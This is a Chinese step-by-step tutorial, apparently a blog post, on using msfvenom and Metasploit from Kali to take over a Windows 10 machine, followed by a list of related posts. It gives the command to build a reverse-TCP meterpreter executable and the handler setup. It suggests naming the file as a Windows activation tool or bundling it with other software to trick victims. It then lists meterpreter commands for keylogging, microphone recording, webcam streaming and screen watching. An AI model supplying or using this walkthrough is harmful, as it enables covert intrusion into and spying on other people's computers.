Kali利用msfvenom渗透Windows电脑

  • 一、什么是msf
    • 演示环境
  • 二、渗透流程
    • 1.进入管理员模式
    • 2.生成可执行文件
    • 3.运行msfconsole命令
    • 4.配置参数
    • 5.在靶机打开可执行文件
    • 6.查看用户
  • 三、meterpreter渗透靶机的命令
    • 1.监控靶机电脑屏幕
    • 2.更多命令

一、什么是msf

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)

二、渗透流程

1.进入管理员模式

命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

2.生成可执行文件

命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等

这个就是Kali主机的IP地址

接下来运行命令生成文件

默认生成的文件在根目录下

把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令: msfconsole

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击

5.在靶机打开可执行文件


我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

出现meterpreter你就已经成功的入侵的对方的电脑

三、meterpreter渗透靶机的命令

1.监控靶机电脑屏幕

命令: run vnc -i

2.更多命令

还可以查看帮助文档,命令help

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

把文件上传到靶机命令

把文件下载到主机命令

Kali利用msf渗透Windows电脑(超详细)相关推荐

  1. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  2. 利用msf控制目标电脑

    利用msf控制目标电脑 准备工作 永恒之蓝漏洞 msf简介 利用永恒之蓝漏洞攻击win7 准备工作 kali Linux虚拟机一台 win7虚拟机一台(要关闭防火墙和杀软的) 注意两台机器要连接到同一 ...

  3. kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

    kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...

  4. Kali利用MSF入侵安卓手机

    kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

  5. Git安装教程(Windows安装超详细教程)

    Git安装教程(Windows安装超详细教程)  weir_will 关注 0.9 2017.10.08 00:59* 字数 728 阅读 17955评论 8喜欢 41 2018年4月14日更新  更 ...

  6. 【C#】C#中使用GDAL3(一):Windows下超详细编译C#版GDAL3.3.0(VS2015+.NET 4+32位/64位)

    转载请注明原文地址:https://www.cnblogs.com/litou/p/15004877.html 总目录 (一)Windows下超详细编译C#版GDAL3.3.0(VS2015+.NET ...

  7. Kali利用msf对MS10_061漏洞进行渗透测试

    注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...

  8. Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)...

    本博文举的例,是利用远程溢出windows服务器. Exploit/windows/smb/ms08_067_netapi. Payload :    windows/shell/bind_tcp T ...

  9. 【工具使用】——Metasploit(MSF)使用详解(超详细)

    文章目录 一.实验环境: 二.简介: 三.Metasploit的安装和更新升级: 1. 一键安装MSF: 2. MSF的更新升级: 2.1 非kali环境下更新升级MSF: 2.2 kali环境下更新 ...

最新文章

  1. OpenCV的示例程序在哪里?
  2. 自定义时间格式 返回年月日
  3. 对于多个 BAPI一起commit!
  4. python调用c#注意事项_Python调用C#编写的DLL
  5. Entity Framework Core 实现MySQL 的TimeStamp/RowVersion 并发控制
  6. Oracle plsql 月历
  7. @Transactional事务不生效问题解决(springboot)
  8. MySQL笔记-binlog理论及binlog回滚恢复数据
  9. 95-242-040-源码-快照-Flink 分布式快照的设计-存储
  10. 【经验心得】关于RPGmaker的工程解码
  11. JDK的安装 - JDK8(1.8.0_301)
  12. Mysql 刷题笔记 0104 求出NAME中每组累加/每组总数的比例大于0.6的ID和NAME
  13. RSF 分布式 RPC 服务信息的暴露
  14. get请求获取淘宝吱口令
  15. java多线程 isAlive方法的有趣现象
  16. python判断阶乘和数_python如何计算数的阶乘
  17. debugger在js中是什么
  18. matlab编程求卫星轨道长度,卫星位置速度与轨道根数之间的计算
  19. 分享:一个自由职业者的心得体会
  20. 企业信息化由谁主导会更好?

热门文章

  1. 双轴晶体中锥形折射的建模与应用
  2. 力扣让我心碎的第八天
  3. 数据库服务器资源使用周报
  4. 一:BT、BLE版本说明及对比
  5. Activiti工作流--并行网关--之九
  6. 掌握AI图像篡改检测工具,轻松识别图片造假
  7. 【UE4 C++】博客目录 / 学习笔记汇总
  8. python小结价格_Python-S
  9. latex宏包特殊符号集锦
  10. spark读取oracle写入kafka,spark读取kafka文件写入hive